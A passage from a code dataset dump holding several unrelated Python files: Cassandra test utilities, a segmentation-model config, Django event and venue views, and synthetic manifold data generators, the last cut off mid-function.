cluster started by populate\ndef new_node(cluster, bootstrap=True, token=None, remote_debug_port='0', data_center=None):\n i = len(cluster.nodes) + 1\n node = Node('node%s' % i,\n cluster,\n bootstrap,\n ('127.0.0.%s' % i, 9160),\n ('127.0.0.%s' % i, 7000),\n str(7000 + i * 100),\n remote_debug_port,\n token,\n binary_interface=('127.0.0.%s' % i, 9042))\n cluster.add(node, not bootstrap, data_center=data_center)\n return node\n\n\ndef insert_columns(tester, session, key, columns_count, consistency=ConsistencyLevel.QUORUM, offset=0):\n upds = [\"UPDATE cf SET v=\\'value%d\\' WHERE key=\\'k%s\\' AND c=\\'c%06d\\'\" % (i, key, i) for i in xrange(offset * columns_count, columns_count * (offset + 1))]\n query = 'BEGIN BATCH %s; APPLY BATCH' % '; '.join(upds)\n simple_query = SimpleStatement(query, consistency_level=consistency)\n session.execute(simple_query)\n\n\ndef query_columns(tester, session, key, columns_count, consistency=ConsistencyLevel.QUORUM, offset=0):\n query = SimpleStatement('SELECT c, v FROM cf WHERE key=\\'k%s\\' AND c >= \\'c%06d\\' AND c <= \\'c%06d\\'' % (key, offset, columns_count + offset - 1), consistency_level=consistency)\n res = list(session.execute(query))\n assertions.assert_length_equal(res, columns_count)\n for i in xrange(0, columns_count):\n assert_equal(res[i][1], 'value{}'.format(i + offset))\n\n\ndef retry_till_success(fun, *args, **kwargs):\n timeout = kwargs.pop('timeout', 60)\n bypassed_exception = kwargs.pop('bypassed_exception', Exception)\n\n deadline = time.time() + timeout\n while True:\n try:\n return fun(*args, **kwargs)\n except bypassed_exception:\n if time.time() > deadline:\n raise\n else:\n # brief pause before next attempt\n time.sleep(0.25)\n\n\n# Simple puts and get (on one row), testing both reads by names and by slice,\n# with overwrites and flushes between inserts to make sure we hit multiple\n# sstables on reads\ndef putget(cluster, session, cl=ConsistencyLevel.QUORUM):\n\n _put_with_overwrite(cluster, 
session, 1, cl)\n\n # reads by name\n # We do not support proper IN queries yet\n # if cluster.version() >= \"1.2\":\n # session.execute('SELECT * FROM cf USING CONSISTENCY %s WHERE key=\\'k0\\' AND c IN (%s)' % (cl, ','.join(ks)))\n # else:\n # session.execute('SELECT %s FROM cf USING CONSISTENCY %s WHERE key=\\'k0\\'' % (','.join(ks), cl))\n # _validate_row(cluster, session)\n # slice reads\n query = SimpleStatement('SELECT * FROM cf WHERE key=\\'k0\\'', consistency_level=cl)\n rows = list(session.execute(query))\n _validate_row(cluster, rows)\n\n\ndef _put_with_overwrite(cluster, session, nb_keys, cl=ConsistencyLevel.QUORUM):\n for k in xrange(0, nb_keys):\n kvs = [\"UPDATE cf SET v=\\'value%d\\' WHERE key=\\'k%s\\' AND c=\\'c%02d\\'\" % (i, k, i) for i in xrange(0, 100)]\n query = SimpleStatement('BEGIN BATCH %s APPLY BATCH' % '; '.join(kvs), consistency_level=cl)\n session.execute(query)\n time.sleep(.01)\n cluster.flush()\n for k in xrange(0, nb_keys):\n kvs = [\"UPDATE cf SET v=\\'value%d\\' WHERE key=\\'k%s\\' AND c=\\'c%02d\\'\" % (i * 4, k, i * 2) for i in xrange(0, 50)]\n query = SimpleStatement('BEGIN BATCH %s APPLY BATCH' % '; '.join(kvs), consistency_level=cl)\n session.execute(query)\n time.sleep(.01)\n cluster.flush()\n for k in xrange(0, nb_keys):\n kvs = [\"UPDATE cf SET v=\\'value%d\\' WHERE key=\\'k%s\\' AND c=\\'c%02d\\'\" % (i * 20, k, i * 5) for i in xrange(0, 20)]\n query = SimpleStatement('BEGIN BATCH %s APPLY BATCH' % '; '.join(kvs), consistency_level=cl)\n session.execute(query)\n time.sleep(.01)\n cluster.flush()\n\n\ndef _validate_row(cluster, res):\n assertions.assert_length_equal(res, 100)\n for i in xrange(0, 100):\n if i % 5 == 0:\n assert_equal(res[i][2], 'value{}'.format(i * 4), 'for {}, expecting value{}, got {}'.format(i, i * 4, res[i][2]))\n elif i % 2 == 0:\n assert_equal(res[i][2], 'value{}'.format(i * 2), 'for {}, expecting value{}, got {}'.format(i, i * 2, res[i][2]))\n else:\n assert_equal(res[i][2], 'value{}'.format(i), 'for {}, expecting value{}, got {}'.format(i, i, res[i][2]))\n\n\n# Simple puts and range gets, with overwrites and flushes between inserts to\n# make sure we hit multiple sstables on reads\ndef range_putget(cluster, session, cl=ConsistencyLevel.QUORUM):\n keys = 100\n\n _put_with_overwrite(cluster, session, keys, cl)\n\n paged_results = session.execute('SELECT * FROM cf LIMIT 10000000')\n rows = [result for result in paged_results]\n\n assertions.assert_length_equal(rows, keys * 100)\n for k in xrange(0, keys):\n res = rows[:100]\n del rows[:100]\n _validate_row(cluster, res)\n\n\ndef replace_in_file(filepath, search_replacements):\n \"\"\"\n In-place file search and replace.\n\n filepath - The path of the file to edit\n search_replacements - a list of tuples (regex, replacement) that\n represent however many search and replace operations you wish to\n perform.\n\n Note: This does not work with multi-line regexes.\n \"\"\"\n for line in fileinput.input(filepath, inplace=True):\n for regex, replacement in search_replacements:\n line = re.sub(regex, replacement, line)\n sys.stdout.write(line)\n\n\ndef generate_ssl_stores(base_dir, passphrase='cassandra'):\n \"\"\"\n Util for generating ssl stores using java keytool -- nondestructive: if the stores already exist, this method is\n a no-op.\n\n @param base_dir (str) directory where keystore.jks, truststore.jks and ccm_node.cer will be placed\n @param passphrase (Optional[str]) currently ccm expects a passphrase of 'cassandra' so it's the default but it can be\n overridden for failure 
testing\n @return None\n @throws CalledProcessError If the keytool fails during any step\n \"\"\"\n\n if os.path.exists(os.path.join(base_dir, 'keystore.jks')):\n debug(\"keystores already exists - skipping generation of ssl keystores\")\n return\n\n debug(\"generating keystore.jks in [{0}]\".format(base_dir))\n subprocess.check_call(['keytool', '-genkeypair', '-alias', 'ccm_node', '-keyalg', 'RSA', '-validity', '365',\n '-keystore', os.path.join(base_dir, 'keystore.jks'), '-storepass', passphrase,\n '-dname', 'cn=Cassandra Node,ou=CCMnode,o=DataStax,c=US', '-keypass', passphrase])\n debug(\"exporting cert from keystore.jks in [{0}]\".format(base_dir))\n subprocess.check_call(['keytool', '-export', '-rfc', '-alias', 'ccm_node',\n '-keystore', os.path.join(base_dir, 'keystore.jks'),\n '-file', os.path.join(base_dir, 'ccm_node.cer'), '-storepass', passphrase])\n debug(\"importing cert into truststore.jks in [{0}]\".format(base_dir))\n subprocess.check_call(['keytool', '-import', '-file', os.path.join(base_dir, 'ccm_node.cer'),\n '-alias', 'ccm_node', '-keystore', os.path.join(base_dir, 'truststore.jks'),\n '-storepass', passphrase, '-noprompt'])\n\n\nclass since(object):\n\n def __init__(self, cass_version, max_version=None):\n self.cass_version = LooseVersion(cass_version)\n self.max_version = max_version\n if self.max_version is not None:\n self.max_version = LooseVersion(self.max_version)\n\n def _skip_msg(self, version):\n if version < self.cass_version:\n return \"%s < %s\" % (version, self.cass_version)\n if self.max_version and version > self.max_version:\n return \"%s > %s\" % (version, self.max_version)\n\n def _wrap_setUp(self, cls):\n orig_setUp = cls.setUp\n\n @functools.wraps(cls.setUp)\n def wrapped_setUp(obj, *args, **kwargs):\n orig_setUp(obj, *args, **kwargs)\n version = LooseVersion(obj.cluster.version())\n msg = self._skip_msg(version)\n if msg:\n obj.skip(msg)\n\n cls.setUp = wrapped_setUp\n return cls\n\n def _wrap_function(self, f):\n @functools.wraps(f)\n def wrapped(obj):\n version = LooseVersion(obj.cluster.version())\n msg = self._skip_msg(version)\n if msg:\n obj.skip(msg)\n f(obj)\n return wrapped\n\n def __call__(self, skippable):\n if isinstance(skippable, type):\n return self._wrap_setUp(skippable)\n return self._wrap_function(skippable)\n\n\ndef no_vnodes():\n \"\"\"\n Skips the decorated test or test class if using vnodes.\n \"\"\"\n return unittest.skipIf(not DISABLE_VNODES, 'Test disabled for vnodes')\n\n\ndef require(require_pattern, broken_in=None):\n \"\"\"\n Skips the decorated class or method, unless the argument\n 'require_pattern' is a case-insensitive regex match for the name of the git\n branch in the directory from which Cassandra is running. For example, the\n method defined here:\n\n @require('compaction-fixes')\n def compaction_test(self):\n ...\n\n will run if Cassandra is running from a directory whose current git branch\n is named 'compaction-fixes'. If 'require_pattern' were\n '.*compaction-fixes.*', it would run only when Cassandra is being run from a\n branch whose name contains 'compaction-fixes'.\n\n To accommodate current branch-naming conventions, it also will run if the\n current Cassandra branch matches 'CASSANDRA-{require_pattern}'. 
This allows\n users to run tests like:\n\n @require(4200)\n class TestNewFeature(self):\n ...\n\n on branches named 'CASSANDRA-4200'.\n\n If neither 'require_pattern' nor 'CASSANDRA-{require_pattern}' is a\n case-insensitive match for the name of Cassandra's current git branch, the\n test function or class will be skipped with unittest.skip.\n\n To run decorated methods as if they were not decorated with @require, set\n the environment variable IGNORE_REQUIRE to 'yes' or 'true'. To only run\n methods decorated with require, set IGNORE_REQUIRE to 'yes' or 'true' and\n run `nosetests` with `-a required`. (This uses the built-in `attrib`\n plugin.)\n \"\"\"\n tagging_decorator = attr('required')\n if IGNORE_REQUIRE:\n return tagging_decorator\n require_pattern = str(require_pattern)\n git_branch = ''\n git_branch = cassandra_git_branch()\n\n if git_branch:\n git_branch = git_branch.lower()\n run_on_branch_patterns = (require_pattern, 'cassandra-{b}'.format(b=require_pattern))\n # always run the test if the git branch name matches\n if any(re.match(p, git_branch, re.IGNORECASE) for p in run_on_branch_patterns):\n return tagging_decorator\n # if skipping a buggy/flapping test, use since\n elif broken_in:\n def tag_and_skip_after_version(decorated):\n return since('0', broken_in)(tagging_decorator(decorated))\n return tag_and_skip_after_version\n # otherwise, skip with a message\n else:\n def tag_and_skip(decorated):\n return unittest.skip('require ' + str(require_pattern))(tagging_decorator(decorated))\n return tag_and_skip\n else:\n return tagging_decorator\n\n\ndef known_failure(failure_source, jira_url, flaky=False, notes=''):\n \"\"\"\n Tag a test as a known failure. Associate it with the URL for a JIRA\n ticket and tag it as flaky or not.\n\n Valid values for failure_source include: 'cassandra', 'test', 'driver', and\n 'systemic'.\n\n To run all known failures, use the functionality provided by the nosetests\n attrib plugin, using the known_failure and known_flaky attributes:\n\n # only run tests that are known to fail\n $ nosetests -a known_failure\n # only run tests that are not known to fail\n $ nosetests -a !known_failure\n # only run tests that fail because of cassandra bugs\n $ nosetests -a known_failure=cassandra\n # only run tests that fail because of cassandra bugs, but are not flaky\n $ nosetests -a known_failure=cassandra -a !known_flaky\n\n Known limitations: a given test may only be tagged once and still work as\n expected with the attrib plugin machinery; if you decorate a test with\n known_failure multiple times, the known_failure attribute of that test\n will have the value applied by the outermost instance of the decorator.\n \"\"\"\n valid_failure_sources = ('cassandra', 'test', 'systemic', 'driver')\n\n def wrapper(f):\n assert_in(failure_source, valid_failure_sources)\n assert_is_instance(flaky, bool)\n\n tagged_func = attr(known_failure=failure_source,\n jira_url=jira_url)(f)\n if flaky:\n tagged_func = attr('known_flaky')(tagged_func)\n\n tagged_func = attr(failure_notes=notes)(tagged_func)\n return tagged_func\n return wrapper\n\n\ndef cassandra_git_branch(cdir=None):\n '''Get the name of the git branch at CASSANDRA_DIR.\n '''\n cdir = CASSANDRA_DIR if cdir is None else cdir\n try:\n p = subprocess.Popen(['git', 'branch'], cwd=cdir,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n except OSError as e: # e.g. 
if git isn't available, just give up and return None\n debug('shelling out to git failed: {}'.format(e))\n return\n\n out, err = p.communicate()\n # fail if git failed\n if p.returncode != 0:\n raise RuntimeError('Git printed error: {err}'.format(err=err))\n [current_branch_line] = [line for line in out.splitlines() if line.startswith('*')]\n return current_branch_line[1:].strip()\n\n\ndef safe_mkdtemp():\n tmpdir = tempfile.mkdtemp()\n # \\ on Windows is interpreted as an escape character and doesn't do anyone any favors\n return tmpdir.replace('\\\\', '/')\n\n\nclass InterruptBootstrap(Thread):\n\n def __init__(self, node):\n Thread.__init__(self)\n self.node = node\n\n def run(self):\n self.node.watch_log_for(\"Prepare completed\")\n self.node.stop(gently=False)\n\n\nclass InterruptCompaction(Thread):\n \"\"\"\n Interrupt compaction by killing a node as soon as\n the \"Compacting\" string is found in the log file\n for the table specified. This requires debug level\n logging in 2.1+ and expects debug information to be\n available in a file called \"debug.log\" unless a\n different name is passed in as a parameter.\n \"\"\"\n\n def __init__(self, node, tablename, filename='debug.log', delay=0):\n Thread.__init__(self)\n self.node = node\n self.tablename = tablename\n self.filename = filename\n self.delay = delay\n self.mark = node.mark_log(filename=self.filename)\n\n def run(self):\n self.node.watch_log_for(\"Compacting(.*)%s\" % (self.tablename,), from_mark=self.mark, filename=self.filename)\n if self.delay > 0:\n random_delay = random.uniform(0, self.delay)\n debug(\"Sleeping for {} seconds\".format(random_delay))\n time.sleep(random_delay)\n debug(\"Killing node {}\".format(self.node.address()))\n self.node.stop(gently=False)\n\n\nclass KillOnBootstrap(Thread):\n\n def __init__(self, node):\n Thread.__init__(self)\n self.node = node\n\n def run(self):\n self.node.watch_log_for(\"JOINING: Starting to bootstrap\")\n self.node.stop(gently=False)\n\n\ndef get_keyspace_metadata(session, keyspace_name):\n cluster = session.cluster\n cluster.refresh_keyspace_metadata(keyspace_name)\n return cluster.metadata.keyspaces[keyspace_name]\n\n\ndef get_schema_metadata(session):\n cluster = session.cluster\n cluster.refresh_schema_metadata()\n return cluster.metadata\n\n\ndef get_table_metadata(session, keyspace_name, table_name):\n cluster = session.cluster\n cluster.refresh_table_metadata(keyspace_name, table_name)\n return cluster.metadata.keyspaces[keyspace_name].tables[table_name]\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":19446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"204515353","text":"import sys\nimport os\nimport time\nimport numpy as np\nfrom easydict import EasyDict as edict\nimport argparse\n\nC = edict()\nconfig = C\ncfg = C\n\nC.repo_name = 'semantic-segmentation-pytorch'\n\"\"\" The absolute path\"\"\"\nC.abs_dir = os.path.realpath(\".\")\n\"\"\" The name of this folder\"\"\"\nC.config_dir = C.abs_dir.split(os.path.sep)[-1]\n\"\"\" segm dir \"\"\"\nC.seg_dir = C.abs_dir[:C.abs_dir.index(C.repo_name) + len(C.repo_name)]\n\"\"\" The log root folder\"\"\"\nC.log_dir = C.seg_dir + '/log/' + C.config_dir\n\"\"\" The log \"\"\"\nC.log_dir_link = os.path.join(C.abs_dir, 'log')\n\"\"\" The exp_pref for this experiment \"\"\"\nC.exp_time = time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime())\n\"\"\" The snapshots folder\"\"\"\nC.snapshot_dir = C.log_dir + '/snapshot/'\n\"\"\" The log file 
path\"\"\"\nC.log_file = C.log_dir + '/log_' + C.exp_time + '.log'\nC.link_log_file = C.log_dir + '/log_last.log'\nC.val_log_file = C.log_dir + '/val_' + C.exp_time + '.log'\nC.link_val_log_file = C.log_dir + '/val_last.log'\n\nC.img_root_folder = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/\"\nC.ann_root_folder = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/\"\nC.train_source = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/config/train.txt\"\nC.eval_source = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/config/val.txt\"\nC.test_source = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/config/voc12_test.txt\"\n\n\nC.pretrain_model = os.path.join(C.seg_dir, 'pretrain_model/resnet101-5d3b4d8f.pth')\n\n\ndef add_path(path):\n if path not in sys.path:\n sys.path.insert(0, path)\n\n\n#add_path(os.path.join(C.seg_dir, 'utils'))\nadd_path(C.seg_dir)\n#add_path(os.path.join(C.seg_dir, 'utils'))\n\n\nif __name__ == '__main__':\n for i in C:\n print(i, C[i])\n # parser = argparse.ArgumentParser()\n\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"599051723","text":"from django.shortcuts import render\nimport calendar\nfrom calendar import HTMLCalendar\nfrom datetime import datetime \nfrom django.http import HttpResponseRedirect \nfrom .models import Event, Venue\nfrom .forms import VenueForm\n\ndef search_destinations(request):\n\tif request.method == \"POST\":\n\t\tsearched = request.POST['searched']\n\t\tvenues = Venue.objects.filter(name__contains=searched)\n\t\treturn render(request, 'events/search_destinations.html',\n\t\t{'searched':searched, 'venues':venues})\n\telse:\n\t\treturn render(request, 'events/search_destinations.html',\n\t\t{})\n\t\n\t\n\n \n\ndef show_venue(request, venue_id):\n\tvenue = Venue.objects.get(pk=venue_id)\n\treturn render(request, 'events/show_venue.html',\n\t\t{'venue': venue})\n\ndef list_venues(request):\n\tvenue_list = Venue.objects.all()\n\treturn render(request, 'events/venues.html',\n\t\t{'venue_list': venue_list})\n\ndef add_venue(request):\n\tsubmitted = False\n\tif request.method == \"POST\":\n\t\tform = VenueForm\n\t\tform = VenueForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/add_venue?submitted=True')\n\telse: \n\t\tform = VenueForm\n\t\tif 'submitted' in request.GET:\n\t\t\tsubmitted = True\n\treturn render(request, 'events/add_venue.html', {'form':form, 'submitted':submitted})\n\ndef all_events(request):\n\tevents_list = Event.objects.all()\n\treturn render(request, 'events/event_list.html',\n\t\t{'event_list': events_list})\n\ndef home(request, year=datetime.now().year, month=datetime.now().strftime('%B')):\n\tname = \"Tourist\"\n\tmonth = month.capitalize()\n\t# Convert month from name to number\n\tmonth_number = list(calendar.month_name).index(month)\n\tmonth_number = int(month_number)\n\n\t# Create calendar\n\tcal = HTMLCalendar().formatmonth(\n\t\tyear, \n\t\tmonth_number)\n\n\t# Get current year\n\tnow = datetime.now()\n\tcurrent_year = now.year\n\n\n\n\treturn render(request, \n\t\t'events/home.html', \n\t\t{\"name\": name,\n \"year\": year,\n \"month\": month,\n \"month_number\": month_number,\n \"cal\": cal,\n \"current_year\": 
current_year,\n\n\t\t})","sub_path":"events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"294980908","text":"#\n# BSD 3-Clause License\n#\n# Copyright (c) 2020, Jonathan Bac\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\nimport numpy as np\nfrom sklearn.utils.validation import check_random_state\nfrom ._commonfuncs import hyperBall\n\n\ndef hyperSphere(n_points, n_dim, center=[], random_state=None):\n \"\"\"\n Generates a sample from a uniform distribution on an hypersphere surface\n \"\"\"\n random_state_ = check_random_state(random_state)\n vec = random_state_.randn(n_points, n_dim)\n vec /= np.linalg.norm(vec, axis=1)[:, None]\n return vec\n\n\ndef hyperTwinPeaks(n_points, n_dim=2, height=1, random_state=None):\n \"\"\" \n Translated from Kerstin Johnsson's R package intrinsicDimension\n \"\"\"\n random_state_ = check_random_state(random_state)\n base_coord = random_state_.uniform(size=(n_points, n_dim))\n _height = height * np.prod(np.sin(2 * np.pi * base_coord), axis=1, keepdims=1)\n return np.hstack((base_coord, _height))\n\n\ndef swissRoll3Sph(Ns, Nsph, a=1, b=2, nturn=1.5, h=4, random_state=None):\n \"\"\"\n Generates a sample from a uniform distribution on a Swiss roll-surface, \n possibly together with a sample from a uniform distribution on a 3-sphere\n inside the Swiss roll. Translated from Kerstin Johnsson's R package intrinsicDimension\n\n Parameters\n ----------\n\n Ns : int \n Number of data points on the Swiss roll.\n\n Nsph : int\n Number of data points on the 3-sphere.\n\n a : int or float, default=1\n Minimal radius of Swiss roll and radius of 3-sphere.\n\n b : int or float, default=2\n Maximal radius of Swiss roll.\n\n nturn : int or float, default=1.5\n Number of turns of the surface. 
\n\n h : int or float, default=4\n Height of Swiss roll.\n\n Returns\n -------\n \n np.array, (npoints x ndim)\n \"\"\"\n random_state_ = check_random_state(random_state)\n\n if Ns > 0:\n omega = 2 * np.pi * nturn\n dl = lambda r: np.sqrt(b ** 2 + omega ** 2 * (a + b * r) ** 2)\n ok = np.zeros(1)\n while sum(ok) < Ns:\n r_samp = random_state_.uniform(size=3 * Ns)\n ok = random_state_.uniform(size=3 * Ns) < dl(r_samp) / dl(1)\n\n r_samp = r_samp[ok][:Ns]\n x = (a + b * r_samp) * np.cos(omega * r_samp)\n y = (a + b * r_samp) * np.sin(omega * r_samp)\n z = random_state_.uniform(-h, h, size=Ns)\n w = np.zeros(Ns)\n\n else:\n x = y = z = w = np.array([])\n\n if Nsph > 0:\n sph = hyperSphere(Nsph, 4, random_state=random_state_) * a\n x = np.concatenate((x, sph[:, 0]))\n y = np.concatenate((y, sph[:, 1]))\n z = np.concatenate((z, sph[:, 2]))\n w = np.concatenate((w, sph[:, 3]))\n\n return np.hstack((x[:, None], y[:, None], z[:, None], w[:, None]))\n\n\ndef lineDiskBall(n_points, random_state=None):\n \"\"\" \n Generates a sample from a uniform distribution on a line, an oblong disk and an oblong ball\n Translated from ldbl function in Hideitsu Hino's package\n \"\"\"\n random_state_ = check_random_state(random_state)\n\n line = np.hstack(\n (\n np.repeat(0, 5 * n_points)[:, None],\n np.repeat(0, 5 * n_points)[:, None],\n random_state_.uniform(-0.5, 0, size=5 * n_points)[:, None],\n )\n )\n disc = np.hstack(\n (\n random_state_.uniform(-1, 1, (13 * n_points, 2)),\n np.zeros(13 * n_points)[:, None],\n )\n )\n disc = disc[~(np.sqrt(np.sum(disc ** 2, axis=1)) > 1), :]\n disc = disc[:, [0, 2, 1]]\n disc[:, 2] = disc[:, 2] - min(disc[:, 2]) + max(line[:, 2])\n\n fb = random_state_.uniform(-0.5, 0.5, size=(n_points * 100, 3))\n rmID = np.where(np.sqrt(np.sum(fb ** 2, axis=1)) > 0.5)[0]\n\n if len(rmID) > 0:\n fb = fb[~(np.sqrt(np.sum(fb ** 2, axis=1)) > 0.5), :]\n\n fb = np.hstack((fb[:, :2], fb[:, [2]] + 0.5))\n fb[:, 2] = fb[:, 2] - min(fb[:, 2]) + max(disc[:, 2])\n\n # if _sorted:\n # fb = fb[order(fb[:, 2]),:]\n\n line2 = np.hstack(\n (\n np.repeat(0, 5 * n_points)[:, None],\n np.repeat(0, 5 * n_points)[:, None],\n random_state_.uniform(-0.5, 0, size=5 * n_points)[:, None],\n )\n )\n line2[:, 2] = line2[:, 2] - min(line2[:, 2]) + max(fb[:, 2])\n lineID = np.repeat(1, len(line))\n discID = np.repeat(2, len(disc))\n fbID = np.repeat(3, len(fb))\n line2ID = np.repeat(1, len(line2))\n x = np.vstack((line, disc, fb, line2))\n useID = np.sort(random_state_.choice(len(x), n_points, replace=False))\n x = x[useID, :]\n\n return x, np.concatenate((lineID, discID, fbID, line2ID), axis=0)[useID]\n\n\n### Hein manifolds\n\n\nclass DataGenerator:\n # modified from https://github.com/stat-ml/GeoMLE\n # Original licence citation:\n # MIT License\n #\n # Copyright (c) 2019 Mokrov Nikita, Marina Gomtsyan, Maxim Panov and Yury Yanovich\n #\n # Permission is hereby granted, free of charge, to any person obtaining a copy\n # of this software and associated documentation files (the \"Software\"), to deal\n # in the Software without restriction, including without limitation the rights\n # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n # copies of the Software, and to permit persons to whom the Software is\n # furnished to do so, subject to the following conditions:\n #\n # The above copyright notice and this permission notice shall be included in all\n # copies or substantial portions of the Software.\n #\n # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n # 
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n # SOFTWARE.\n\n def __init__(self, random_state: int = None, type_noise: str = \"norm\"):\n\n self.set_rng(random_state)\n self.set_gen_noise(type_noise)\n self.dict_gen = {\n # synthetic data\n \"Helix1d\": gen_helix1_data,\n \"Helix2d\": gen_helix2_data,\n \"Helicoid\": gen_helicoid_data,\n \"Spiral\": gen_spiral_data,\n \"Roll\": gen_roll_data,\n \"Scurve\": gen_scurve_data,\n \"Star\": gen_star_data,\n \"Moebius\": gen_moebius_data,\n \"Sphere\": gen_sphere_data,\n \"Norm\": gen_norm_data,\n \"Uniform\": gen_uniform_data,\n \"Cubic\": gen_cubic_data,\n \"Affine_3to5\": gen_affine3_5_data,\n \"Affine\": gen_affine_data,\n \"Nonlinear_4to6\": gen_nonlinear4_6_data,\n \"Nonlinear\": gen_nonlinear_data,\n \"Paraboloid\": gen_paraboloid_data,\n }\n\n def set_rng(self, random_state: int = None):\n if random_state is not None:\n np.random.seed(random_state)\n\n def set_gen_noise(self, type_noise: str):\n if not hasattr(self, \"rng\"):\n self.set_rng()\n if type_noise == \"norm\":\n self.gen_noise = np.random.randn\n if type_noise == \"uniform\":\n self.gen_noise = lambda n, dim: np.random.rand(n, dim) - 0.5\n\n def gen_data(\n self,\n name: str,\n n: int,\n dim: int,\n d: int,\n type_sample: str = \"uniform\",\n noise: float = 0.0,\n ):\n # Parameters:\n # --------------------\n # name: string\n # Type of generetic data\n # n: int\n # The number of sample points\n # dim: int\n # The dimension of point\n # d: int\n # The hyperplane dimension\n # noise: float, optional(default=0.0)\n # The value of noise in data\n\n # Returns:\n # data: pd.Dataframe of shape (n, dim)\n # The points\n assert name in self.dict_gen.keys(), \"Name of data is unknown\"\n if type_sample == \"uniform\":\n if name == \"Sphere\":\n sampler = np.random.randn\n else:\n sampler = np.random.rand\n elif type_sample == \"nonuniform\":\n if name == \"Sphere\":\n sampler = uniform_sampler\n else:\n sampler = bound_nonuniform_sampler\n else:\n assert False, \"Check type_sample\"\n\n data = self.dict_gen[name](n=n, dim=dim, d=d, sampler=sampler)\n noise = self.gen_noise(n, dim) * noise\n\n return data + noise\n\n\ndef bound_nonuniform_sampler(*args):\n x = np.random.randn(*args) * 0.1 + 0.5\n x[x < 0] = -x[x < 0]\n x[x > 1] = x[x > 1] - 1\n x[x < 0] = -x[x < 0]\n return x\n\n\ndef uniform_sampler(*args):\n x = np.random.rand(*args)\n x = (x - 0.5) * 3\n return x\n\n\ndef gen_spiral_data(n, dim, d, sampler):\n assert d < dim\n assert d == 1\n assert dim >= 3\n t = 10 * np.pi * sampler(n)\n data = np.vstack([100 * np.cos(t), 100 * np.sin(t), t, np.zeros((dim - 3, n))]).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_helix1_data(n, dim, d, sampler):\n assert d < dim\n assert d == 1\n assert dim >= 3\n t = 2 * np.pi / n + sampler(n) * 2 * np.pi\n data = np.vstack(\n [\n (2 + np.cos(8 * t)) * np.cos(t),\n (2 + np.cos(8 * t)) * np.sin(t),\n np.sin(8 * t),\n np.zeros((dim - 3, n)),\n ]\n ).T\n assert data.shape == (n, dim)\n return data\n\n\ndef gen_helix2_data(n, dim, d, sampler):\n assert d < dim\n assert d == 2\n assert dim >= 3\n r = 10 * np.pi * sampler(n)\n p = 10 * np.pi * sampler(n)\n data = np.vstack([r * np.cos(p), r * 
